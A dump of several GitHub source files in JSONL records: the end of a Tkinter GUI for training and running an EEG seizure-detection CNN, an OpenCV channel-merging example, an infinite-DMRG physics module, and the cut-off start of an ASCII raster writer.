FP) * 100\n        precision = TP / (TP + FP) * 100\n        error = (FP + FN) / (TP + FP + TN + FN)\n        #F1 = 2 * (precision * recall) / (precision + recall)\n        print(\"acc: \", accuracy)\n        print(\"recall:\", recall)\n        print(\"precision:\", precision)\n        print('F1-score:', f_score)\n        #\n        #print(\"spec:\", specificity)\n        print(\"error:\", error)\n\n        Resultado = \"Resultado.png\"\n        width = 600\n        height = 400\n        img = Image.open(Resultado)\n        img = img.resize((width, height), Image.ANTIALIAS)\n        self.accurancy = ImageTk.PhotoImage(img)\n        canvas4.imageList = []\n        canvas4.pack()\n        canvas4.create_image(200, 230, anchor=\"w\", image=self.accurancy)\n        canvas4.imageList.append(self.accurancy)\n\n        label2 = Label(self.root5, text='accuracy:')\n        label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n                      fg=\"#14787A\",\n                      bg=\"#DFEBE9\")\n        canvas4.create_window(100, 100, window=label2)\n        label4 = Label(self.root5, text=accuracy)\n        self.accurancyValue_Entry = accuracy\n        formatted_recall = \"{:.2f}\".format(recall)\n        recall = formatted_recall\n        formatted_precision = \"{:.2f}\".format(precision)\n        precision = formatted_precision\n        self.recallValue_Entry = formatted_recall\n        self.precisionValue_Entry = formatted_precision\n        label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n        canvas4.create_window(100, 130, window=label4)\n\n        label2 = Label(self.root5, text='recall:')\n        label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n                      fg=\"#14787A\",\n                      bg=\"#DFEBE9\")\n        canvas4.create_window(100, 200, window=label2)\n        label4 = Label(self.root5, text=recall)\n        self.recallValue_Entry = recall\n        label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n        canvas4.create_window(100, 230, window=label4)\n\n        label2 = Label(self.root5, text='precision:')\n        label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n                      fg=\"#14787A\",\n                      bg=\"#DFEBE9\")\n        canvas4.create_window(100, 300, window=label2)\n        label4 = Label(self.root5, text=precision)\n        self.precisionValue_Entry = precision\n        label4.config(font=(\"AvantGarde\", 14, 
\"bold\"), bg=\"#DFEBE9\")\n canvas4.create_window(100, 330, window=label4)\n\n self.precision = self.precisionValue_Entry\n self.recall = self.recallValue_Entry\n self.accuracy = self.accurancyValue_Entry\n self.nomeArquivo = self.nomeArquivoEDF\n\n ## Criando botao alterar\n self.Boton_close = Button(self.root5,\n text=\"Close\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.root5.destroy,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_close.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n def JanelaClassificacao(self):\n self.root5 = Toplevel()\n self.tela5()\n self.frames_de_telaClassification()\n self.MenusClassification()\n self.Classificacao()\n\n # JANELA DO PREDICITION\n def frames_de_telaPrediction(self):\n self.frame_1 = Frame(self.root9, bd=4, bg='#DFEBE9')\n self.frame_1.place(relx=0.70, rely=0.02, relwidth=0.27, relheight=0.80)\n\n self.Boton_info.place(relx=0.02,\n rely=0.2,\n relwidth=0.98,\n relheight=0.10)\n\n self.Boton_close.place(relx=0.02,\n rely=0.8,\n relwidth=0.98,\n relheight=0.10)\n\n def MenusPrediction(self):\n menubar = Menu(self.root9)\n self.root9.config(menu=menubar)\n filemenu = Menu(menubar)\n filemenu2 = Menu(menubar)\n\n def Quit():\n self.root9.destroy()\n\n menubar.add_cascade(label=\"Options\", menu=filemenu)\n menubar.add_cascade(label=\"Reports\", menu=filemenu2)\n filemenu.add_command(label=\"exit\", command=Quit)\n filemenu2.add_command(label=\"Clean\", command=self.limpa_cliente)\n filemenu2.add_command(label=\"Customer File\",\n command=self.gerarRelatorioCliente)\n\n def tela6(self):\n self.root9.title(\"Prediction\")\n self.root9.config(bg=\"#DFEBE9\")\n self.root9.geometry(\"1024x768\")\n self.root9.resizable(True, True)\n self.root9.maxsize(width=900, height=700)\n self.root9.minsize(width=500, height=400)\n self.root9.transient(self.root2)\n self.root9.focus_force()\n self.root9.grab_set()\n\n def Treinamento2(self):\n canvas3 = Canvas(self.root9,\n width=1000,\n height=500,\n relief='raised',\n bg=\"#DFEBE9\")\n canvas3.pack()\n\n print(\"TREINAMENTO2 START ---------------------\")\n # ------ Load the trained CNN model\n print(self.existed_model_name.get())\n network_name = self.existed_model_name.get()\n model = tf.keras.models.load_model(network_name)\n\n # ---- Load data files\n data = self.nomeArquivoEDF\n event = LeituraArquivos.LoadEvento(self.nomeArquivoTSE)\n # print(event)\n\n # --- read EEG data\n raw = mne.io.read_raw_edf(data, preload=True)\n raw.rename_channels(lambda s: s.strip(\".\"))\n #raw.set_montage(\"standard_1020\")\n #raw.set_eeg_reference(\"average\")\n print(raw) # print raw data\n print(raw.info) # print edf info\n\n # ---- sampling rate\n fs = raw.info['sfreq'] # sampling frequency\n duration = len(\n raw) / fs # recording duration of hole eeg data in seconds\n\n # ---- EEG data\n eeg = raw.get_data()\n\n # ---- Remove 60 Hz noise\n signal_filter = processing.butter_bandstop_filter(eeg, 59, 61, fs, 5)\n signal_filter = signal_filter[0:21, :] #Limit at 21 channels\n\n #------ Signal Bands\n delta_teta = processing.butter_bandpass_filter(signal_filter, 1, 7, fs,\n 5)\n alpha_beta = processing.butter_bandpass_filter(signal_filter, 8, 30,\n fs, 5)\n gamma = processing.butter_bandpass_filter(signal_filter, 31, 100, fs,\n 5)\n # ------ Applied STFT to signal bands\n f, t, Zxx_delta_teta = processing.STFT(delta_teta, fs)\n f, t, Zxx_alpha_beta = processing.STFT(alpha_beta, fs)\n f, t, Zxx_gamma = processing.STFT(gamma, fs)\n\n # ------- 
Create event vector 0 and 1\n event_vec = processing.EventVector(event, t)\n\n # ------- Cut first 1 minute\n Zxx_delta_teta = Zxx_delta_teta[60:, :, :]\n Zxx_alpha_beta = Zxx_alpha_beta[60:, :, :]\n Zxx_gamma = Zxx_gamma[60:, :, :]\n event_vec = event_vec[60:]\n\n # ------- Create the input network\n Zxx_size = Zxx_delta_teta.shape\n Input_net = np.zeros((Zxx_size[0], Zxx_size[1], Zxx_size[2], 3))\n Input_net[:, :, :, 0] = Zxx_delta_teta\n Input_net[:, :, :, 1] = Zxx_alpha_beta\n Input_net[:, :, :, 2] = Zxx_gamma\n\n # -------- Classify events\n cm, predictions, precision, recall, f_score = network.classify(\n model, Input_net, event_vec)\n #cm_plot_labels = [\"Seizure-free\", \"Seizure\"]\n #network.plot_confusion_matrix(cm,\n # cm_plot_labels,\n # title=\"Confusion Matrix\")\n\n #plt.savefig('Resultado.png')\n\n TP = cm[1][1]\n TN = cm[0][0]\n FN = cm[1][0]\n FP = cm[0][1]\n\n print(\n \"---------------------------- PREDICT IMAGE --------------------\")\n plots.plot_predict(t, event_vec, predictions)\n print(\"---------------------------- IMAGE DONE --------------------\")\n # -------- metrics\n accuracy = (TP + TN) / (TP + FP + TN + FN) * 100\n formatted_accuracy = \"{:.2f}\".format(accuracy)\n accuracy = formatted_accuracy\n\n recall = TP / (TP + FN) * 100 #also know as recall\n specificity = TN / (TN + FP) * 100\n precision = TP / (TP + FP) * 100\n error = (FP + FN) / (TP + FP + TN + FN)\n #F1 = 2 * (precision * recall) / (precision + recall)\n print(\"acc: \", accuracy)\n print(\"recall:\", recall)\n print(\"precision:\", precision)\n print('F1-score:', f_score)\n #\n #print(\"spec:\", specificity)\n print(\"error:\", error)\n\n ## Criando botao alterar\n self.Boton_close = Button(self.root9,\n text=\"Close\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.root9.destroy,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_close.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n ## Criando botao alterar\n #self.canvas_bt = Canvas(self.root9, bd=0, bg='blue')\n #self.canvas_bt.place(relx=0.1, rely=0.8, relwidth=0.02, relheight=0.02)\n\n ## Criando botao alterar\n #self.canvas_bt = Canvas(self.root9, bd=0, bg='green')\n #self.canvas_bt.place(relx=0.1,\n # rely=0.86,\n # relwidth=0.02,\n # relheight=0.02)\n\n ## Criando botao alterar\n #self.canvas_bt = Canvas(self.root9, bd=0, bg='red')\n #self.canvas_bt.place(relx=0.1,\n # rely=0.92,\n # relwidth=0.02,\n # relheight=0.02)\n\n #self.Botao = Button(self.root9,\n # text=\"Normal\",\n # font=(\"AvantGarde\", 10, \"bold\"),\n # bg='#DFEBE9',\n # width=\"5\",\n # height=\"1\")\n #self.Botao.place(relx=0.15, rely=0.78, relwidth=0.1, relheight=0.05)\n\n #self.Botao = Button(self.root9,\n # text=\"Predictions\",\n # font=(\"AvantGarde\", 10, \"bold\"),\n # bg='#DFEBE9',\n # width=\"5\",\n # height=\"1\")\n #self.Botao.place(relx=0.15, rely=0.84, relwidth=0.1, relheight=0.05)\n\n #self.Botao = Button(self.root9,\n # text=\"Ictal\",\n # font=(\"AvantGarde\", 10, \"bold\"),\n # bg='#DFEBE9',\n # width=\"5\",\n # height=\"1\")\n #self.Botao.place(relx=0.15, rely=0.91, relwidth=0.1, relheight=0.05)\n\n #labelNew2 = Label(self.root9, text='Normal')\n #labelNew2.config(font=('helvetica',14),bg=\"#DFEBE9\")\n #canvas3.create_window(2, 10, window=labelNew2)\n\n #labelNew3 = Label(self.root9, text='Normal')\n #labelNew3.config(font=('helvetica',14),bg=\"#DFEBE9\")\n #canvas3.create_window(2, 10, window=labelNew3)\n\n Resultado = \"Prediction.png\"\n width = 600\n height = 400\n img 
= Image.open(Resultado)\n        img = img.resize((width, height), Image.ANTIALIAS)\n        self.accurancy = ImageTk.PhotoImage(img)\n        canvas3.imageList = []\n        canvas3.pack()\n        canvas3.create_image(200, 230, anchor=\"w\", image=self.accurancy)\n        canvas3.imageList.append(self.accurancy)\n\n        label2 = Label(self.root9, text='Accuracy:')\n        label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n                      fg=\"#14787A\",\n                      bg=\"#DFEBE9\")\n        canvas3.create_window(100, 100, window=label2)\n        label4 = Label(self.root9, text=accuracy)\n        self.accurancyValue_Entry = accuracy\n        formatted_recall = \"{:.2f}\".format(recall)\n        recall = formatted_recall\n        formatted_precision = \"{:.2f}\".format(precision)\n        precision = formatted_precision\n        self.recallValue_Entry = formatted_recall\n        self.precisionValue_Entry = formatted_precision\n        label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n        canvas3.create_window(100, 130, window=label4)\n\n        label2 = Label(self.root9, text='Recall:')\n        label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n                      fg=\"#14787A\",\n                      bg=\"#DFEBE9\")\n        canvas3.create_window(100, 200, window=label2)\n        label4 = Label(self.root9, text=recall)\n        self.recallValue_Entry = recall\n        label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n        canvas3.create_window(100, 230, window=label4)\n\n        label2 = Label(self.root9, text='Precision:')\n        label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n                      fg=\"#14787A\",\n                      bg=\"#DFEBE9\")\n        canvas3.create_window(100, 300, window=label2)\n        label4 = Label(self.root9, text=precision)\n        self.precisionValue_Entry = precision\n        label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n        canvas3.create_window(100, 330, window=label4)\n\n    def JanelaPrediction(self):\n        self.root9 = Toplevel()\n        self.tela6()\n        self.frames_de_telaPrediction()\n        self.MenusPrediction()\n        self.Treinamento2()\n\n    # TRAINING WINDOW\n    def TreinamentoModelo(self):\n        # 1) Get the file name\n        # 2) Check whether it exists in the folder\n        # 3) If it does not exist but a file was expected, send a message\n        # 4) If there is a file, read it and run it through Keras\n        # 5) If there is no existing model, create a new one\n        # print(self.Tipvar.get())\n        # print(self.new_model_name.get())\n\n        network_name = self.new_model_name.get()\n        type_network = self.Tipvar.get()\n        print(\"Entered\")\n        print(network_name)\n        print(self.Tipvar.get())\n\n        if type_network == \"Old Model\":\n            flag = 1\n        else:\n            flag = 0\n\n        if flag == 0:\n            #---- CNN model\n            model = network.Model()\n            print(\"New model\")\n        else:\n            model = tf.keras.models.load_model(network_name)\n            print(\"Trained model\")\n\n        Zxx_delta_teta_v = []\n        Zxx_alpha_beta_v = []\n        Zxx_gamma_v = []\n        event_vec_v = []\n\n        for i in range(0, 20):\n            # ---- Load data files\n            #data = load.loadEDF()\n            #self.ditArquivoEDF\n            diretorioEDF = self.ditArquivoEDF\n            diretorioTSE = self.ditArquivoTSE\n\n            arquivoEDF = diretorioEDF + \"/train_\" + str(i + 1) + \".edf\"\n            arquivoTSE = diretorioTSE + \"/train_\" + str(i + 1) + \".tse\"\n\n            data_doc = open(arquivoEDF, 'r')\n            data = data_doc.name\n            f_tse_doc = open(arquivoTSE, 'r')\n            event = load.read_event(f_tse_doc.name)\n            # print(event)\n\n            # --- read EEG data\n            raw = mne.io.read_raw_edf(data, preload=True)\n            raw.rename_channels(lambda s: s.strip(\".\"))\n            #raw.set_montage(\"standard_1020\")\n            #raw.set_eeg_reference(\"average\")\n            print(raw)  # print raw data\n            print(raw.info)  # print edf info\n\n            # ---- sampling rate\n            fs = raw.info['sfreq']  # sampling frequency\n            duration = len(\n                raw) / fs  # recording duration of whole EEG data in seconds\n\n            # ---- 
EEG data\n eeg = raw.get_data()\n\n # ---- Remove 60 Hz noise\n signal_filter = processing.butter_bandstop_filter(\n eeg, 59, 61, fs, 5)\n signal_filter = signal_filter[0:21, :] #Limit at 21 channels\n\n #------ Signal Bands\n delta_teta = processing.butter_bandpass_filter(\n signal_filter, 1, 7, fs, 5)\n alpha_beta = processing.butter_bandpass_filter(\n signal_filter, 8, 30, fs, 5)\n gamma = processing.butter_bandpass_filter(signal_filter, 31, 100,\n fs, 5)\n # ------ Applied STFT to signal bands\n f, t, Zxx_delta_teta = processing.STFT(delta_teta, fs)\n f, t, Zxx_alpha_beta = processing.STFT(alpha_beta, fs)\n f, t, Zxx_gamma = processing.STFT(gamma, fs)\n\n # ------- Create event vector 0 and 1\n event_vec = processing.EventVector(event, t)\n\n # ------- Cut first 1 minute\n Zxx_delta_teta = Zxx_delta_teta[60:, :, :]\n Zxx_alpha_beta = Zxx_alpha_beta[60:, :, :]\n Zxx_gamma = Zxx_gamma[60:, :, :]\n event_vec = event_vec[60:]\n\n Zxx_delta_teta_v.append(Zxx_delta_teta)\n Zxx_alpha_beta_v.append(Zxx_alpha_beta)\n Zxx_gamma_v.append(Zxx_gamma)\n event_vec_v.append(event_vec)\n print(i)\n\n Zxx_delta_teta_total = np.concatenate(\n (Zxx_delta_teta_v[0], Zxx_delta_teta_v[1]), axis=0)\n Zxx_alpha_beta_total = np.concatenate(\n (Zxx_alpha_beta_v[0], Zxx_alpha_beta_v[1]), axis=0)\n Zxx_gamma_total = np.concatenate((Zxx_gamma_v[0], Zxx_gamma_v[1]),\n axis=0)\n event_vec_total = (event_vec_v[0] + event_vec_v[1])\n\n arch_number = len(Zxx_delta_teta_v)\n\n for i in range(2, arch_number):\n Zxx_delta_teta_total = np.concatenate(\n (Zxx_delta_teta_total, Zxx_delta_teta_v[i]), axis=0)\n Zxx_alpha_beta_total = np.concatenate(\n (Zxx_alpha_beta_total, Zxx_alpha_beta_v[i]), axis=0)\n Zxx_gamma_total = np.concatenate((Zxx_gamma_total, Zxx_gamma_v[i]),\n axis=0)\n event_vec_total += event_vec_v[i]\n\n # ------- Create the input network\n Zxx_size = Zxx_delta_teta_total.shape\n Input_net = np.zeros((Zxx_size[0], Zxx_size[1], Zxx_size[2], 3))\n Input_net[:, :, :, 0] = Zxx_delta_teta_total\n Input_net[:, :, :, 1] = Zxx_alpha_beta_total\n Input_net[:, :, :, 2] = Zxx_gamma_total\n\n # -------- Train CNN model\n [acc, val_acc, loss1,\n val_loss1], model = network.train(model, Input_net, event_vec_total)\n #os.makedirs('models/')\n model.save(network_name)\n\n # -------- Learning plots\n #plots.plot_acc_curve(acc, val_acc)\n #plots.plot_loss_curve(loss1, val_loss1)\n\n # -------- Tela\n sinal_delta_theta = Zxx_delta_teta_total\n sinal_alpha_beta = Zxx_alpha_beta_total\n sinal_gama = Zxx_gamma_total\n delta_theta_dividido = ProcessamentoDoSinal.dividir_sinal(\n sinal_delta_theta, fs)\n\n alpha_beta_dividido = ProcessamentoDoSinal.dividir_sinal(\n sinal_alpha_beta, fs)\n gama_dividido = ProcessamentoDoSinal.dividir_sinal(sinal_gama, fs)\n AssociaTrechoEvento.associa_trecho_evento(delta_theta_dividido,\n eventos)\n AssociaTrechoEvento.associa_trecho_evento(alpha_beta_dividido, eventos)\n AssociaTrechoEvento.associa_trecho_evento(gama_dividido, eventos)\n dados = CriaImagen.cria_imagens_saidas(gama_dividido,\n delta_theta_dividido,\n alpha_beta_dividido)\n\n fft_imagens = []\n for i in range(0, len(dados[0])):\n fft = np.fft.fftn(dados[0][i])\n fft = np.log(np.abs(np.fft.fftshift(fft)**2))\n img_fft = tf.keras.preprocessing.image.array_to_img(fft)\n array_fft = tf.keras.preprocessing.image.img_to_array(img_fft)\n array_fft = array_fft * (1.0 / 255)\n fft_imagens.append(array_fft)\n\n fft_imagens = np.array(fft_imagens)\n UsaRede.treina_rede(fft_imagens, dados[1])\n cm = UsaRede.classifica_dados(fft_imagens, dados[1])\n 
predictions = UsaRede.classifica_sem_saidas(fft_imagens)\n        cm_plot_labels = [\"Normal\", \"Epilepsy\"]\n        #ConfusionMatrix.plot_confusion_matrix(cm,\n        #                                      cm_plot_labels,\n        #                                      title=\"Confusion Matrix\")\n        TP = cm[1][1]\n        TN = cm[0][0]\n        FN = cm[1][0]\n        FP = cm[0][1]\n        accuracy = (TP + TN) / (TP + FP + TN + FN) * 100\n        formatted_accuracy = \"{:.2f}\".format(accuracy)\n        accuracy = formatted_accuracy\n        precision = TP / (TP + FP) * 100\n        if TP == 0:\n            recall = 0\n        else:\n            recall = TP / (TP + FN) * 100  # ADD DATASET\n        predictions = np.array(predictions)\n        self.accurancyValue_Entry = accuracy\n        formatted_recall = \"{:.2f}\".format(recall)\n        recall = formatted_recall\n        formatted_precision = \"{:.2f}\".format(precision)\n        precision = formatted_precision\n        self.recallValue_Entry = formatted_recall\n        self.precisionValue_Entry = formatted_precision\n        self.recallValue_Entry = recall\n        self.precisionValue_Entry = precision\n\n    # Training Loading Window\n    def tela12(self):\n        self.root8.title(\"Training Loading\")\n        self.root8.config(bg=\"#DFEBE9\")\n        self.root8.geometry(\"1024x768\")\n        self.root8.resizable(True, True)\n        self.root8.maxsize(width=300, height=300)\n        self.root8.minsize(width=300, height=300)\n        self.root8.transient(self.root2)\n        self.root8.focus_force()\n        self.root8.grab_set()\n\n    def TelaClassificacaoResults(self):\n        canvasroot8 = Canvas(self.root8,\n                             width=1000,\n                             height=700,\n                             relief='raised',\n                             bg=\"#DFEBE9\")\n        canvasroot8.pack()\n\n        #Imagens logs=os\n        width = 500\n        height = 200\n\n        # Title\n        label2 = Label(\n            self.root8,\n            text=\"\"\"The training will take a few minutes, please wait \n          until the confirmation window appears \"\"\")\n        label2.config(font=('helvetica', 9), bg=\"#DFEBE9\")\n        canvasroot8.create_window(145, 40, window=label2)\n\n    def TreinamentoOcorrendo(self):\n        self.root8 = Toplevel()\n        self.tela12()\n        self.TelaClassificacaoResults()\n\n\nApplication()","repo_name":"natuneuro/Seizure-Detection-Python","sub_path":"Tela.py","file_name":"Tela.py","file_ext":"py","file_size_in_byte":75307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42764548502","text":"# -*- coding:utf-8 -*-\nimport cv2 as cv\nimport sys\nimport numpy as np\n\n\nif __name__ == '__main__':\n    # Read the image and check whether it was read successfully\n    img = cv.imread('./images/lena.jpg')\n    if img is None:\n        print('Failed to read lena.jpg.')\n        sys.exit()\n\n    # Split the channels\n    b, g, r = cv.split(img)\n\n    # Create an all-zero matrix with the same size as the image\n    zeros = np.zeros(img.shape[:2], dtype='uint8')\n\n    # Merge image matrices with the same number of channels\n    bg = cv.merge([b, g, zeros])\n    gr = cv.merge([zeros, g, r])\n    br = cv.merge([b, zeros, r])\n    # Merge image matrices with different numbers of channels\n    bgr_6 = cv.merge([bg, r, zeros, zeros])\n\n    # Show the results\n    cv.imshow('Blue', b)\n    cv.imshow('Green', g)\n    cv.imshow('Red', r)\n    cv.imshow('Blue_Green', bg)\n    cv.imshow('Green_Red', gr)\n    cv.imshow('Blue_Red', br)\n\n    # Close the windows\n    cv.waitKey(0)\n    cv.destroyAllWindows()\n","repo_name":"fengzhenHIT/learnOpenCV4_Python","sub_path":"chapter3/Split_and_merge.py","file_name":"Split_and_merge.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"72"} +{"seq_id":"28418953356","text":"'''\n=============================================\nInfinite density matrix renormalization group\n=============================================\n\niDMRG, including:\n    * classes: iDMRG\n    * functions: iDMRGTSG, 
iDMRGQP\n'''\n\n__all__=['iDMRG','iDMRGTSG','iDMRGQP']\n\nfrom .DMRG import *\nimport time\nimport warnings\nimport numpy as np\nimport itertools as it\nimport matplotlib.pyplot as plt\nfrom numpy.linalg import norm\nfrom HamiltonianPy import *\nfrom HamiltonianPy.TensorNetwork import *\nfrom .DMRG import *\n\nclass iDMRG(DMRG):\n '''\n Infinite density matrix renormalization group.\n\n Attributes\n ----------\n niter : int\n The number of iterations.\n '''\n CORE=('niter','lattice','block','cache')\n\n def __init__(self,tsg,lattice,terms,config,degfres,mask=(),ttype='D',dtype=np.complex128,target=0,**karg):\n '''\n Constructor.\n\n Parameters\n ----------\n tsg : TSG\n The two-site grow app.\n lattice,terms,config,degfres,mask,ttype,dtype,target :\n See DMRG.__init__ for details.\n '''\n super(iDMRG,self).__init__(lattice,terms,config,degfres,mask,ttype,dtype,target)\n assert isinstance(tsg,TSG)\n self.preload(tsg)\n self.niter=-1\n\n @property\n def TSG(self):\n '''\n Two-site grow app.\n '''\n return self.apps[self.preloads[0]]\n\n @property\n def mpo(self):\n '''\n MPO shifted by the last ground state energy.\n '''\n if self.niter<0:\n mpo=MPO()\n elif self.niter1:\n for i,site in enumerate(it.chain(sites[:nspb],sites[-nspb:])):\n self.cache['shiftedsites'][-nspb*2+i][0].site=site\n sites=sites[nspb:3*nspb]\n self.cache['shiftedsites'].extend(OptStr([Opt.identity(site,self.dtype)*(-self.block.info['Esite'])]) for site in sites)\n mpo=OptMPO(self.cache['optstrs']+self.cache['shiftedsites'],self.degfres).tompo(ttype=self.block.ttype)\n else:\n self.cache['optstrs']=[OptStr.fromoperator(operator,self.degfres) for operator in self.generator.operators]\n sites=self.block.mps.sites\n self.cache['shiftedsites']=[OptStr([Opt.identity(site,self.dtype)*(-self.block.info['Esite'])]) for site in sites]\n mpo=OptMPO(self.cache['optstrs']+self.cache['shiftedsites'],self.degfres).tompo(ttype=self.block.ttype)\n mpo=mpo[len(mpo)//2-len(sites)//2:len(mpo)//2+len(sites)//2]\n lold,rold=self.block.mpo[0].labels[MPO.L],self.block.mpo[-1].labels[MPO.R]\n lnew,rnew=mpo[0].labels[MPO.L],mpo[-1].labels[MPO.R]\n assert lnew.equivalent(lold) and rnew.equivalent(rold)\n return mpo\n\n def update(self,**karg):\n '''\n Update the iDMRG with new parameters.\n '''\n super(iDMRG,self).update(**karg)\n if len(karg)>0 and len(self.generator.operators)>0:\n self.block.reset(mpo=self.mpo,LEND=self.block.lcontracts[0],REND=self.block.rcontracts[-1])\n\n def resetgenerator(self):\n '''\n Reset the generator of the engine.\n '''\n self.config.reset(pids=self.lattice.pids)\n self.degfres.reset(leaves=self.config.table(mask=self.mask,maps={'scope':iDMRG.scopemap}))\n self.generator.reset(bonds=self.lattice.bonds,config=self.config)\n\n @staticmethod\n def scopemap(scope):\n '''\n '''\n if isinstance(scope,str):\n assert scope in {'A','B'}\n return (1,) if scope=='A' else (2,)\n else:\n assert isinstance(scope,tuple) and len(scope)==2\n return (0,scope[1]) if scope[0]=='L' else (2,-scope[1])\n\n def iterate(self,target=None):\n '''\n Iterate the block of the DMRG.\n\n Parameters\n ----------\n target : QuantumNumber, optional\n The target of the block of the DMRG.\n '''\n self.niter+=1\n osvs=self.cache.get('osvs',np.array([1.0]))\n if self.niter>=self.lattice.nneighbour+self.DTRP:\n self.cache['osvs']=self.block.mps.Lambda.data\n self.block.mpo=self.mpo\n sites=self.block.mps.sites\n obonds=[bond.identifier for bond in self.block.mpo.bonds]\n sbonds=[bond.identifier for bond in self.block.mps.bonds]\n 
qn=target-self.block.target if isinstance(target,QuantumNumber) else 0\n self.block.predict(sites,obonds,sbonds,osvs,qn)\n else:\n A,B=(('L',0),('R',0)) if self.niter==0 else ('A','B')\n ls=[('L',i) for i in range(self.niter)]\n rs=[('R',i) for i in reversed(range(self.niter))]\n self.lattice.insert(A,B,news=ls+rs)\n self.resetgenerator()\n mpo=self.mpo\n sites,bonds=self.degfres.labels('S'),self.degfres.labels('B')\n if self.block.ttype=='S': sites=[site.replace(qns=site.qns.sorted()) for site in sites]\n osvs=self.cache.get('osvs',np.array([1.0]))\n qn=target-self.block.target if isinstance(target,QuantumNumber) else 0\n self.cache['osvs']=self.block.mps.Lambda.data if self.niter>0 else np.array([1.0])\n mps=self.block.mps.impsgrowth(sites,bonds,osvs,qn,ttype=self.block.ttype)\n self.block.reset(mpo=mpo,mps=mps,target=target)\n if self.niter+1==self.lattice.nneighbour+self.DTRP:\n nsite,nspb=self.block.nsite,self.nspb\n self.block=self.block[nsite//2-nspb:nsite//2+nspb]\n\ndef iDMRGTSG(engine,app):\n '''\n This method iterative update the iDMRG (two-site update).\n\n Parameters\n ----------\n engine : iDMRG\n app : TSG\n '''\n niter=app.recover(engine)\n if niter<0:\n engine.log.open()\n nspb=engine.nspb\n def TSGSWEEP(nsweep,ngrowth):\n assert engine.block.cut==engine.block.nsite/2\n path=list(it.chain(['<<']*(nspb-1),['>>']*(nspb*2-2),['<<']*(nspb-1)))\n for sweep in range(nsweep):\n seold=engine.block.info['Esite']\n engine.sweep(info='No.%s-%s'%(ngrowth+1,sweep+1),path=path,nmax=app.nmax,divisor=2*nspb,piechart=app.plot)\n senew=engine.block.info['Esite']\n if norm(seold-senew)/norm(seold+senew)0 or engine.niter>0,divisor=2*nspb,nmax=app.nmax,piechart=app.plot)\n TSGSWEEP(app.npresweep if engine.niter==0 else app.nsweep,i)\n senew=engine.block.info['Esite']\n if i>=app.miniter-1 and seold is not None and norm(seold-senew)/norm(seold+senew)<10*app.tol: break\n else:\n warnings.warn('iDMRGTSG warning: not converged energy after %s iterations.'%app.maxiter)\n if app.plot and app.savefig:\n plt.savefig('%s/%s_%s_%s.png'%(engine.log.dir,engine,engine.block.target,app.name))\n plt.close()\n if app.savedata: engine.dump()\n engine.log.close()\n\ndef iDMRGQP(engine,app):\n '''\n This function calculate the pumped charge during an adiabatic process.\n\n Parameters\n ----------\n engine : iDMRG\n app : QP\n '''\n def pumpedcharge(parameters):\n t1=time.time()\n engine.update(**parameters)\n engine.rundependences(app.name)\n def averagedcharge(mps):\n ps=mps.Lambda.data**2\n qnindex=mps.Lambda.labels[0].qns.type.names.index(app.qnname)\n qns=mps.Lambda.labels[0].qns.expansion()[:,qnindex]\n return ps.dot(qns)/ps.sum()\n result=averagedcharge(engine.block.mps)-getattr(engine.block.target,app.qnname)/2\n t2=time.time()\n engine.log<<':::: %s\\n'%(', '.join('%s=%s'%(key,decimaltostr(value)) for key,value in engine.parameters.items()))\n engine.log<<':::: pumped charge=%.6f, time=%.4es\\n\\n'%(result,t2-t1)\n return result\n result=np.zeros((app.path.rank(0),2))\n for i,parameters in enumerate(app.path('+')):\n result[i,0]=list(parameters.values())[0] if len(parameters)==1 else i\n result[i,1]=pumpedcharge(parameters)\n name='%s_%s'%(engine.tostr(mask=app.path.tags),app.name)\n if app.savedata: np.savetxt('%s/%s.dat'%(engine.dout,name),result)\n if app.plot: app.figure('L',result,'%s/%s'%(engine.dout,name))\n if app.returndata: return 
result\n","repo_name":"waltergu/HamiltonianPy","sub_path":"DMRG/iDMRG.py","file_name":"iDMRG.py","file_ext":"py","file_size_in_byte":9115,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"72"} +{"seq_id":"1200384906","text":"import numpy as np\n\ndef write_ascii_raster(file,EE,NN,ZZ,nodata_value=-9999):\n\t# Open File, appending extension if needed\n\tif file.split('.')[-1] != 'ascii':\n\t\tfobj = open(file+'.ascii',\"w\")\n\telse:\n\t\tfobj = open(file,\"w\")\n\t# Write Header\n\tfobj.write('ncols %d\\n'%(EE.shape[1]))\n\tfobj.write('nrows %d\\n'%(EE.shape[0]))\n\tfobj.write('xllcorner %.3f\\n'%(np.nanmin(EE)))\n\tfobj.write('yllcorner %.3f\\n'%(np.nanmin(NN)))\n\tfobj.write('cellsize %.3f\\n'%(np.nanmean(EE[:,1:] - EE[:,:-1])))\n\tfobj.write('nodata_value %.3f\\n'%(nodata_value))\n\n\t# Iterate across input griddata\n\tfor i_ in np.arange(EE.shape[0],0,-1)-1:\n\t\tfor j_ in range(EE.shape[1]):\n\t\t\tz_ij = ZZ[i_,j_]\n\t\t\t# Check if nodata (handles NaN & Inf)\n\t\t\tif not np.isfinite(z_ij):\n\t\t\t\tz_ij = nodata_value\n\t\t\t# Write entry ij\n\t\t\tfobj.write('%.3f'%(z_ij))\n\t\t\t# If not done with the line, add a space\n\t\t\tif j_+1 < EE.shape[1]:\n\t\t\t\tfobj.write(' ')\n\t\t\t# If done with the line, but more lines are present, add a return\n\t\t\telif i_ > 